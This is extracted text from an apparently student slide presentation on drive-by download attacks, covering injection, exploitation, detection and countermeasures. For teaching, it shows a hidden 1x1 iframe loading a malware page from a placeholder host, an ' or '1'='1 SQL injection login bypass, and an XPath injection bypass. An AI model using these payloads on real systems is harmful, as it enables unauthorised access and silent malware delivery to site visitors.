Drive-By DownloadsPresenter: Darakhshan NazTeacher: Professor Dr. Muhammad Mubashir Khan04.05.20131
Agenda Introduction Mechanisms of Drive-by Download General Detection Approach Security Measures Assessment & Conclusion2
What is Drive-by Download? A technique that involves◦ Intended downloads without understanding consequenes E.g. Executables◦ Unintended downloads E.g. Virus, spyware Can happen by:◦ Visiting a website◦ Viewing an email message Installs malicious program, termed as Malwares◦ Through Malwares, attacker gets full or partial control ofvictim‘s system3
4(2) Read emailContains awebsite link(3) Attractuser‘s interestUser ClickWebsite hasmany links(5) Surf every sitebut getting bored (nointerest develop)Close websiteUserAttacker(6) Sends usera spoofed EmailUser‘s browser(7) Attacker sends malicious code and exploit vulnerability(8) Malicious codecreates connectionbetween user andattacker(9) Download and installits backdoor Program(10) Steal all user‘s important files andmake him compromised over networkExample - ScenarioDrive – By Download !Source of Concept : Report- Defence against Drive-by Download by National Security Agency USUser is completelyunaware of attack(4) Go to website(1) Open Browser
Purpose of Drive-by Download• Provide gateway to botnets.• Take advantages of vulnerabilities.• Steal personal or confidential information of user.• Leads or redirects user to other malicious websitesand make him compromised.5
Mechanisms of Drive-by Download6Basic Concept of Drive-by Download Attack (Source: )1 243InjectionExploitation
Injection What is Injection :◦ The act of entering data into application by bypassingsecurity controls and change its behaviour in unexpectedway. Reason of Injection :◦ Existance of vulnerabilities. Drive-by Download initates by the injection ofmalicious code in database, application or server. Ways of Malicious code injection:◦ Injection through iFrames◦ SQL Injection◦ XPATH Injection7
How and where to Inject ?8Source : http://www.malware-info.com/mal_faq_inject.html• SQL Injection• Xpath InjectionInjection through iFramesMalware placeddirectly onWebserver
Injection through iFrames The most basic form of injected code is a maliciousiFrame such as: Example:<div style=visibility: hidden; position: absolute: 1; top:1><iframe id=IFRAME name=IFRAMEsrc= http://www.example.com/page_with_malware.htmscrolling= no width=1 height=1 vspace=0hspace=0 frameborder=0></iframe></div>9This iFrame is present in theHTML of a requested webpageContent from thissource render in aninvisible 1 pixel x 1pixel window.Sometimes, iFrames present in encoded form that seems normal.The process of encoding is known as "obfuscation“.
SQL Injection Bypass the authentication process. Provide access of data to malicious user or attacker. Example : In any userForm page if we enterUsername: or‘1‘=‘1 and Password: or‘1‘=‘1then webpage will execute this query formSELECT * FROM UsersWHERE Username=`1 OR `1 = `1‘AND Password = `1 OR `1 = `1‘Parameters have alwayslogical true conditionAuthentication process is validated and attacker can get access toany account in database.12
XPATH Injection Almost similar to SQL Injection. Now “target“ is XML Document. Insecurity caused by the injection of XPATH queryor conditions through webpage. Example :◦ If any user has an account in any site with Username=Johnand Password = test123, then logically he will see hisaccount only.• If same user enters his username like John or 1 = 1 withsame password then system will authenticate him andshow the entire XML document to him.13
Mechanism of Drive-by Download14Basic Concept of Drive-by Download Attack (Source: )1 243InjectionExploitation
Exploitation What is Exploitation :◦ The act by an attacker to perform activities on victim‘s systemon his own wish after getting full or partial control. Reason of Exploitation:◦ Ignore the updating of installed applications.◦ According to Secunia PSI, about 95.46% users have one ormore insecure applications.◦ Newer version may correct one or more vulnerabilities in theinstalled application. Vulnerabilities that are mostly exploited :◦ Browser Vulnerability.◦ Plugin Vulnerability.◦ File Format Vulnerability.15
Types of Vulnerabilities Browser Vulnerability◦ Attacker injects malicious code into user‘s browser andchanges its setting without his knowledge. Plugin Vulnerability◦ Plugin is provided by third parties that can be vulnerable;may lead to buffer overflows, memory corruption issuesand pointer overwrites. File Format Vulnerability◦ Attackers attach malware to Word, Excel or PDF files,distributed through email or websites. Exploit will occurwhen editing program opens them.16
Contd. Detection of these strings can be done through twoways:◦ Controlling and maintaining of string variables wheneverthey are created.◦ For automated detection, libemu library is used. It searches from each character and when it finds a sequenceof valid instructions, it reports shellcode.21
Step4: Investigation of Exploitation Exploitation is last step of Drive-by Downloadattack that take advantage of vulnerabilities. It can be detected through two ways :◦ Analysis of behaviours of Browsers and Plug-ins◦ Monitoring of string passing as parameters and methodcalls. Usually long strings are used in exploits and certainmethods are called in malware downloading.22
Security Measures Updation of softwares. Installation of web-filtering softwares. Implementation of BLADE(Block All Drive-byDownload Exploits). Proper management by Network Administrators. Users should be careful while visiting sitesspecially entertainment and social sites as theymay have Adversaries. Usage of reputed search engines likeGoogle, Microsoft, Yahoo, AVG or Bing. Usage of Virtual Machine for Web Browsing.23
The Bad Can easily happen but very hard to overcome. Possibilities of attack are rapidly increasing butvalidity of detection approaches is not possibleevery time. Defensive approach is better to fight against theseattacks because of two reasons :◦ Intense Dynamic behaviour.◦ Complex and time consuming detection approaches.25
The Ugly Mostly show unexpected behaviour. Due to diversity of different ways of attack, it hashigh ratio of victims and it is difficult to design adetection approach that covers all possibilities. Not any computing device seems to be safe fromDrive-by Download. As Drive-by Download attack is increasingenormously, perhaps in near future, hard drives orportable device vulnerabilities may also exist.26
References(2) Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware InfectionsCollege of Computing, Georgia Institute of Technology, SRIInternational From ACM digital library. Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW:Generating Signatures to Detect Drive-By Downloads GeorgiaInstitute of Technology, Microsoft Bing, Microsoft Research Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in WebBrowsers Indian Institute of Technology, Guwahati, India. Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.:All your Iframes point to us Google Inc., Johns HopkinsUniversity.Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Kruegel, C., Vigna,G.:EVILSEED: A Guided Approach to FindingMaliciousWeb Pages, 2012 IEEE Symposium on Security andPrivacy 29
A particular slide catching your eye?
Clipping is a handy way to collect important slides you want to go back to later.